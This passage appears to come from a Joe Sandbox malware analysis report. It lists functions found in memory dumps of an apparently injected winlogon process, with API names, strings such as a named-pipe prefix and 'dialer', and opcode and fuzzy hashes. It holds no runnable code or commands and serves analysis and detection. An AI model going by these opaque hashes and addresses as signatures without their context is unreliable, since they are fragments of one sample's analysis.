                                                          Function 000001FC6038A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction ID: b1318193781d4cc6bb78014810b64a2055ee698bbde808b0f028f3d775d26cb3
                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction Fuzzy Hash: 7FE1AF72648B498AFB208F65D6403ED77B0F7857A9F140176EE8DA7B99DB38C081D780
                                                          Function 000001FC5FF99944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction ID: e1096997edabe9505d2743e1ae6face439272d8126c56f8c37708183351e7d71
                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction Fuzzy Hash: 38E19C3270474B86EB789B25D6803ED37E1F745798F011226EEA947FA9DB34E092D780
                                                          Function 000001FC6038F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction ID: 2238b7e1a4a6a7d29c7f8f17ed9e00259fe899834cc738f4f78e6604432cffe3
                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction Fuzzy Hash: 5241E532399A0A45EA56DB26AA007F623B1FBC5BF1F1541369D0EE7784EF38C445A380
                                                          Function 000001FC6038104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction ID: 50c8701849607883084f3deabe7b54807453a7bf6e315354a2e61efff1470a08
                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction Fuzzy Hash: 3A416F73218B89C6E760CF21E5443AA77B5F388B99F448139DB8A57B58DF38C545CB80
                                                          Function 000001FC6038D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,000001FC6038C7DE,?,?,?,?,?,?,?,?,000001FC6038CF9D,?,?,00000001), ref: 000001FC6038D087
                                                          • FlsSetValue.KERNEL32(?,?,?,000001FC6038C7DE,?,?,?,?,?,?,?,?,000001FC6038CF9D,?,?,00000001), ref: 000001FC6038D0A6
                                                          • FlsSetValue.KERNEL32(?,?,?,000001FC6038C7DE,?,?,?,?,?,?,?,?,000001FC6038CF9D,?,?,00000001), ref: 000001FC6038D0CE
                                                          • FlsSetValue.KERNEL32(?,?,?,000001FC6038C7DE,?,?,?,?,?,?,?,?,000001FC6038CF9D,?,?,00000001), ref: 000001FC6038D0DF
                                                          • FlsSetValue.KERNEL32(?,?,?,000001FC6038C7DE,?,?,?,?,?,?,?,?,000001FC6038CF9D,?,?,00000001), ref: 000001FC6038D0F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction ID: 0c206bdf74fb0558d2055c52ce8e17d5348024edacd2d5402155423c7d3106df
                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction Fuzzy Hash: 301172706CC24E42F964A7255B563F963617FC43F2F144376A43DE67DAEE68C4416280
                                                          Function 000001FC60387510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: 7ee08e7dfb7b7633f6730d5ad14f9d6aeee0aaea574214e2344bb5d5f433a2c4
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: AC81D13078C60F86FB549B2596813F963B2BBC57A2F1444B5A90CF7796EB38C845A7C0
                                                          Function 000001FC60389DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction ID: a8e30741b9eecb4b2467693b1bdc22aca24fc504cc9af4ea4a2b254ed6a01d26
                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction Fuzzy Hash: 4931E43125AA0AD1EE21DF02A6007F427B4F7C8BB2F5D05769D1DA7790EF38D4459380
                                                          Function 000001FC60393DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction ID: b69b376cdd50cfcec7c137a3ba093362c65fc1e791675e620e9fd2fe343befb2
                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction Fuzzy Hash: A4118E32258E4682E7508B12E9543A963B0F7C8FF6F040234EA1ED77A4EB38C41487C0
                                                          Function 000001FC60382F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction ID: 5561472de700b1bab06130a1ebef11000ce955b11f1ee0e656b0e20197ea9733
                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction Fuzzy Hash: 7B319132749B5A82EA15DF16A7407B967B0FB84BA6F0840309F4D97B55EF34C861D780
                                                          Function 000001FC6038CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction ID: 77c31d92dcb989e98dcc9fe6450b429a7d0b6f11abf32804d70bd1ebddb58127
                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction Fuzzy Hash: 6D118C302DD64E42FA64A72157523B922727BC47F2F1007B5A93EE67E6EE68C441A380
                                                          Function 000001FC6038199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction ID: 15004ac7f021a85e828405cd9003d413e5894c9fe7e091c8b8cd684840252f8a
                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction Fuzzy Hash: E701AD31309A4A82EB54CB12E5983A963B4F788BD2F484035DE5EA3764EF3CC549C380
                                                          Function 000001FC603836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction ID: 520f96140d175be077855706997a71ca4faf851511212fda4c766d920c6ff159
                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction Fuzzy Hash: BA01617425AB4A82FB249B12EA497A533B0BBC4BA3F040434DD4DA7765EF3CC408D780
                                                          Function 000001FC60388FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                          • Instruction ID: e5a75e643d4610407c75dcfbbb20b671f298fdca572a9d1924b1d15d2d7a5069
                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                          • Instruction Fuzzy Hash: 5E51D33234D60B86EB14CF15E94CBA937B5F384BA9F198572DA4AA3748DB34C840E780
                                                          Function 000001FC60381A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction ID: 6992e4587a3b046a89032b692e11b3f12052413d889496037fe1c1151dcbce3b
                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction Fuzzy Hash: 31F0A972308A4691E7208B11FAC43A96374F7887E5F944030CA4D96754DF3CC64DD780
                                                          Function 000001FC60383044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction ID: e0ca1e6fe587a244df5a672e8f58fe0a2b65f4213806d4c538514fb58b1543ce
                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction Fuzzy Hash: 9CF05474649F8A81EA004B13BA441A95370B788FE1F044130DD4E97B24EF2CC4459780
                                                          Function 000001FC6038BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction ID: 2738c78c953bf906a18827ad9c4d1c857a86f5b5883a46ca642b267eb2407a96
                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction Fuzzy Hash: D9F06271259E0B82EB108B24E9443B96330FBC47B2F540239CA6E993F4EF2CC44993C0
                                                          Function 000001FC60385710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                          • Instruction ID: a807c525b5eeb5bceed7b87065c6f87a54eb83d09f3a1e8cdd31dda3bc3411f1
                                                          • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                          • Instruction Fuzzy Hash: EA61F93665DB49C6E7608B15E54036AB7B0F3C87A5F504176FA8E93BA8DB7CC440DB80
                                                          Function 000001FC60394104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 0f6612684ca81c166cb5431641d72a7a572142505ddde0438bcb4b8de6394e24
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 9211EB32ADCE5B12F6641558D765BF511706BF83B6F080634A57EA77D6F628C4C06280
                                                          Function 000001FC5FFA3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 15ddef687b78f8d2be894090b8a4e4136bf3be769e528a97cdb065e11b82db44
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 89118632B90A1B19FA5C171CD6553F511D0EB58774E484738A9F606EF68626F443F580
                                                          Function 000001FC5FF9F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                          • API String ID: 3215553584-4202648911
                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction ID: 7fcfcbbe99a899cd1bc5a7f3bbd15778fbde8329341db0a6fb08d22bb6014a72
                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction Fuzzy Hash: 6A617F3270024B62FA6D9B65D7403B96AE0A785784F544635CA3A17FF4DB74E883E2C0
                                                          Function 000001FC6038AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 602c124d04e0b50ab3bd50a8d7a709c272105d61265720e5e33624be1dd87dde
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: 47618A32608B898AEB14DF65D5803ED77B0F384BA9F044266EF4D63B98DB78C584D780
                                                          Function 000001FC6038AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 8059f2986a864b7f6e788566fda3313c2a8972f750d3d7ffc5addf49512abba8
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: 5C51B372148A8A8AFB748F1196443A877B0F394BA6F144175DB8DE7BD5CB38D450E780
                                                          Function 000001FC5FF9A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 37c2c5bb608b98e047b4ba33756014af5e2b17b59cf6b7509026f0976f23cc1f
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: 6B51A23220028BCAEB788F2597447A877E0F355B84F144329DB6957FA5CB39E492E790
                                                          Function 000001FC5FF98405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction ID: de75216caf47401bebc67c77d188ddea5f3365ed00f416bdb22bda5bdf977d62
                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction Fuzzy Hash: E051B13270120B8ADB58CF15F744BAA37D5F344FA8F948234DA2647B58E734E846D784
                                                          Function 000001FC5FF983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2608683993.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc5ff90000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction ID: b23aa2f9bfcdf7b41d4bdd615e096f580fbafa11dca12449c0dcce2d1e483e91
                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction Fuzzy Hash: C731B03230164796E718DF15FA447AA37E4F740B98F848224EE6A07B68DB38E942D784
                                                          Function 000001FC60392058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction ID: 1edb49d0d9cba1dc21d26b4507e3d2c09a73f457012fc047dbaed582a28267af
                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction Fuzzy Hash: 17D1E332758E8989E711CF66D6403EC3BB1F3947A9F144236CE5DA7B99EA34C806D780
                                                          Function 000001FC603814A4 Relevance: 6.3, APIs: 5, Instructions: 39memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.2610615201.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_35_2_1fc60380000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction ID: 29eefa804fc6ea70af6a1c7813149c57307e68fdbf8769c8cbaa21aab69bcfb6
                                                          • Opcode Fuzzy Hash: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction Fuzzy Hash: B7018032649E99D6E704EF66EA041A963B0F788FD2F044034DB4EA3729EE38C050D7C0
                                                          Function 000001FC60392980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
